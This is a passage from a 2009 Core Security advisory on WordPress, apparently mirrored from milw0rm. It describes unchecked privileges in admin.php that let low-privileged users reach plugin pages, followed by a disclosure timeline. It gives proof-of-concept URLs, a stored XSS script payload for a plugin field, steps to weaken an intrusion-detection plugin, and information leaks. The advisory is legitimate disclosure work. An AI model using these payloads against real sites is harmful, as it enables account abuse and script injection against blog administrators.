installed.\n\n/-----------\n\nhttp://[some_wordpress_blog]/wp-admin/admin.php?page=/collapsing-archives/options.txt\n- -----------/\n\n Instead of the following allowed URL.\n\n/-----------\n\nhttp://[some_wordpress_blog]/wp-admin/options-general.php?page=collapsing-archives/options.txt\n- -----------/\n\n Another example of this information disclosure is shown on Akismet, a\nplugin shipped by default with WordPress.\n\n/-----------\n\nhttp://[some_wordpress_blog]/wp-admin/admin.php?page=akismet/readme.txt\n- -----------/\n\n All plugins we have tested are vulnerable to this kind of information\ndisclosure, but in many of them the PHP files accessed just crashed. On\nthe other hand, for example, with capability 'import', privileges are\nchecked inside 'admin.php':\n\n/-----------\n\nif ( ! 
current_user_can('import') )\n wp_die(__('You are not allowed to import.'));\n- -----------/\n\n More dangerous scenarios exist, all of them can be exploited by users\nwith the Subscriber role, the least privileged.\n\n\n8.4. *Abuse example: XSS in plugin configuration module*\n\nIf installed, *Related Ways To Take Action* is an example of a WordPress\nplugin that is affected by many cross-site scripting vulnerabilities\n(XSS) that can be leveraged by an attacker using the unchecked\nprivileges described in this advisory to inject persistent JavaScript\ncode. Possibly, arbitrary native code can be executed by the attacker if\nthe blog administrator, when he/she logs in, runs injected JavasScript\ncode that edits blog PHP code. The original URL for reconfiguring the\nplugin can be accessed only by the Administrator role.\n\n/-----------\n\nhttp://[some_wordpress_blog]/wordpress/wp-admin/options-general.php?page=related-ways-to-take-action/options.php\n- -----------/\n\n But replacing the PHP file with the generic 'admin.php' any blog user\ncan modify this configuration.\n\n/-----------\n\nhttp://[some_wordpress_blog]/wp-admin/admin.php?page=related-ways-to-take-action/options.php\n- -----------/\n\n The following JavaScript injection can be entered within field *Exclude\nactions by term* to exemplify this kind of abuse. When the administrator\nenters the same page the injected browser code will be executed and\npossibly blog PHP can be modified to run arbitrary native code.\n\n/-----------\n\n\\\"/><script>alert(String.fromCharCode(88)+String.fromCharCode(83)+String.fromCharCode(83))</script><ahref=\"\n\n- -----------/\n\n This is the worst scenario that we found for the vulnerability.\n\n\n8.5. *Abuse example: viewing WP Security Scanner Plugin Dashboard*\n\nIf installed, the WordPress Security Scanner Plugin dashboard can be\nviewed similarly by any user besides the administrator using the plugin\nconfiguration page URL without modification. 
This dashboard includes\ncommon default blog configuration settings that are insecure and should\nbe modified by the blog administrator or hosting.\n\n/-----------\n\nhttp://[some_wordpress_blog]/wp-admin/admin.php?page=wp-security-scan/securityscan.php\n- -----------/\n\n\n\n\n8.6. *Abuse example: reconfiguring WP-IDS, a WordPress Hardening Project*\n\nIf installed, the *Intrusion Detection System Plugin (WPIDS)*[10] can be\naccessed and reconfigured through the same vulnerability.\n\n/-----------\n\nhttp://[some_wordpress_blog]/wp-admin/index.php?page=wp-ids/ids-admin.php\n- -----------/\n\n This gives an attacker the possibility to disable many features of the\nplugin, for example reactivate the forgotten password feature and\nreactivate the XML-RPC blog interface. Also you can deny the weblog\nservice by configuring this plugin to be overly sensitive, blocking any\nrequest. However the plugin cannot be totally disabled because the\nessential IDS parameters 'Maximum impact to ignore bad requests' and\n'Minimum impact to sanitize bad requests' are verified on the server\nside of the blog and cannot be distorted to deactivate the sanitizing or\nblocking features of the web IDS plugin.\n\n\n8.7. *Other Information Disclosures (CVE-2009-2335, CVE-2009-2336, BID\n35584)*\n\nWordPress discriminates bad password from bad user logins; this reduces\nthe complexity of a brute force attack on WordPress blogs login\n(CVE-2009-2335, BID 35584). The same user information disclosure happens\nwhen users use the forgotten mail interface to request a new password\n(CVE-2009-2336, same BID 35584). 
These information disclosures seem to\nhave been previously reported [6] but the WordPress team is refusing to modify\nthem alleging *user convenience*.\n\nDefault installation of WordPress 2.7.1 leaks the name of the user\nposting entries inside the HTML of the blog.\n\n/-----------\n\n <small>June 3rd, 2009 <!-- by leakedusername --></small>\n- -----------/\n\n\n\nAlso several administrative modules give anyone the complete path\nwhere the web application is hosted inside the server. This may simplify\nor enable other malicious attacks. An example follows.\n\n/-----------\n\nhttp://[some_wordpress_blog]/wp-settings.php\n- -----------/\n\n\n\n/-----------\n\nNotice: Use of undefined constant ABSPATH - assumed 'ABSPATH' in\n[WP_LEAKED_PATH]\\wp-settings.php on line 110\nNotice: Use of undefined constant ABSPATH - assumed 'ABSPATH' in\n[WP_LEAKED_PATH]\\wp-settings.php on line 112\nWarning: require(ABSPATHwp-includes/compat.php) [function.require]:\nfailed to open stream:\nNo such file or directory in [WP_LEAKED_PATH]\\wp-settings.php on line 246\nFatal error: require() [function.require]: Failed opening required\n'ABSPATHwp-includes/compat.php'\n(include_path='.;[PHP_LEAKED_PATH]\\php5\\pear') in\n[WP_LEAKED_PATH]\\wp-settings.php on line 246\n\n- -----------/\n\n\n\n\n9. *Report Timeline*\n\n. 2009-06-04:\nCore Security Technologies notifies the WordPress team of the\nvulnerabilities (security@wordpress.org) and offers a technical\ndescription encrypted or in plain-text. Advisory is planned for\npublication on June 22nd.\n\n. 2009-06-08:\nCore notifies again the WordPress team of the vulnerability.\n\n. 2009-06-10:\nThe WordPress team asks Core for a technical description of the\nvulnerability in plain-text.\n\n. 2009-06-11:\nTechnical details sent to WordPress team by Core.\n\n. 2009-06-11:\nWordPress team notifies Core that a fix was produced and is available to\nCore for testing. 
WordPress team asserts that password and username\ndiscrimination as well as username leakage are known and will not be\nfixed because they are convenient for the users.\n\n. 2009-06-12:\nCore tells the WordPress team that the patch will be tested by Core as a\ncourtesy as soon as possible. It also requests confirmation that\nWordPress versions 2.8 and earlier, and WordPress.com, are vulnerable to\nthe flaws included in the advisory draft CORE-2009-0515.\n\n. 2009-06-12:\nWordPress team confirms that WordPress 2.8 and earlier plus\nWordPress.com are vulnerable to the flaws included in the advisory draft.\n\n. 2009-06-17:\nCore informs the WordPress team that the patch is only fixing one of the\nfour proof of concept abuses included in the advisory draft. Core\nreminds the WordPress team that the advisory is scheduled to be\npublished on June 22nd but a new schedule can be discussed.\n\n. 2009-06-19:\nCore asks for a new patched version of WordPress, if available, and\nnotifies the WordPress team that the publication of the advisory was\nre-scheduled to June 30th.\n\n. 2009-06-19:\nWordPress team confirms they have a new patch that has the potential to\nbreak a lot of plugins.\n\n. 2009-06-29:\nWordPress team asks for a delay of advisory CORE-2009-0515\npublication until July 6th, when WordPress MU version will be patched.\n\n. 2009-06-29:\nCore agrees to delay publication of advisory CORE-2009-0515 until July 6th.\n\n. 2009-06-29:\nCore tells the WordPress team that other administrative PHP modules can\nalso be rendered by non-administrative users, such as module\n'admin-post.php' and 'link-parse-opml.php'.\n\n. 2009-07-02:\nWordPress team comments that 'admin.php' and 'admin-post.php' are\nintentionally open and plugins can choose to hook either privileged or\nunprivileged actions. They also comment that unprivileged access to\n'link-parse-opml.php' is benign but having this file open is bad form.\n\n. 
2009-07-02:\nCore sends the WordPress team a new draft of the advisory and comments\nthat there is no capability specified in WordPress documentation for\nconfiguring plugins. Also control of actions registered by plugins is\nnot enforced. Core also notices that the privileges unchecked bug in\n'admin.php?page=' is fixed on WordPress 2.8.1-beta2 latest development\nrelease.\n\n. 2009-07-06:\nCore requests WordPress confirmation of the release date of WordPress\n2.8.1 and WordPress MU 2.8.\n\n. 2009-07-07:\nWordPress team confirms that a release candidate of WordPress 2.8.1 is\nmade available to users and that the advisory may be published.\n\n. 2009-07-06:\nCore requests WordPress confirmation of the release date of WordPress MU\nand WordPress MU new version numbers.\n\n. 2009-07-07:\nWordPress team releases WordPress 2.8.1 RC1 to its users.\n\n. 2009-07-08:\nWordPress team confirms that WordPress MU 2.8.1 will be made available\nas soon as WordPress 2.8.1 is officially released. Probably July 8th or 9th.\n\n. 2009-07-08:\nThe advisory CORE-2009-0515 is published.\n\n\n\n10. 
*References*\n\n[1] WordPress vulnerabilities in CVE database\nhttp://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=wordpress\n[2] SecuriTeam List of WordPress Vulnerabilities\nhttp://www.securiteam.com/products/W/Wordpress.html\n[3] WordPress Vulnerability - YBO Interactive Blog\nhttp://www.ybo-interactive.com/blog/2008/03/30/wordpress-vulnerability/\n[4] bablooO/blyat attacks on WP 2.7.0 and 2.7.1\nhttp://wordpress.org/support/topic/280748\n[5] Security breach - xkcd blog\nhttp://blag.xkcd.com/2009/06/18/security-breach/\n[6] securityvulns.com WordPress vulnerabilities digest in English\nhttp://www.securityfocus.com/archive/1/archive/1/485786/100/0/threaded\n[7] CVE-2008-0196\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0196\n[8] WordPress Roles and Capabilities\nhttp://codex.wordpress.org/Roles_and_Capabilities\n[9] WordPress Download Counter\nhttp://wordpress.org/download/counter/\n[10] WordPress Intrusion Detection System Plugin\nhttp://php-ids.org/2008/02/21/wpids-version-012-released/\n[11] Hardening WordPress with htaccess\nhttp://blogsecurity.net/wordpress/article-210607\n\n\n11. *About CoreLabs*\n\nCoreLabs, the research center of Core Security Technologies, is charged\nwith anticipating the future needs and requirements for information\nsecurity technologies. We conduct our research in several important\nareas of computer security including system vulnerabilities, cyber\nattack planning and simulation, source code auditing, and cryptography.\nOur results include problem formalization, identification of\nvulnerabilities, novel solutions and prototypes for new technologies.\nCoreLabs regularly publishes security advisories, technical papers,\nproject information and shared software tools for public use at:\nhttp://www.coresecurity.com/corelabs.\n\n\n12. 
*About Core Security Technologies*\n\nCore Security Technologies develops strategic solutions that help\nsecurity-conscious organizations worldwide develop and maintain a\nproactive process for securing their networks. The company's flagship\nproduct, CORE IMPACT, is the most comprehensive product for performing\nenterprise security assurance testing. CORE IMPACT evaluates network,\nendpoint and end-user vulnerabilities and identifies what resources are\nexposed. It enables organizations to determine if current security\ninvestments are detecting and preventing attacks. Core Security\nTechnologies augments its leading technology solution with world-class\nsecurity consulting services, including penetration testing and software\nsecurity auditing. Based in Boston, MA and Buenos Aires, Argentina, Core\nSecurity Technologies can be reached at 617-399-6980 or on the Web at\nhttp://www.coresecurity.com.\n\n\n13. *Disclaimer*\n\nThe contents of this advisory are copyright (c) 2009 Core Security\nTechnologies and (c) 2009 CoreLabs, and may be distributed freely\nprovided that no fee is charged for this distribution and proper credit\nis given.\n\n\n14. *PGP/GPG Keys*\n\nThis advisory has been signed with the GPG key of Core Security\nTechnologies advisories team, which is available for download at\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.6 (MingW32)\nComment: Using GnuPG with Mozilla - http://enigmail.mozdev.org\n\niD8DBQFKVR7gyNibggitWa0RAin3AKCOrLLQ8XZnrCLot5d9xoZW6sdWwwCfTJ4N\nTPRpR0Gn0WqmF8HOeDslbA8=\n=zEDK\n-----END PGP SIGNATURE-----\n\n# milw0rm.com [2009-07-10]", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}]}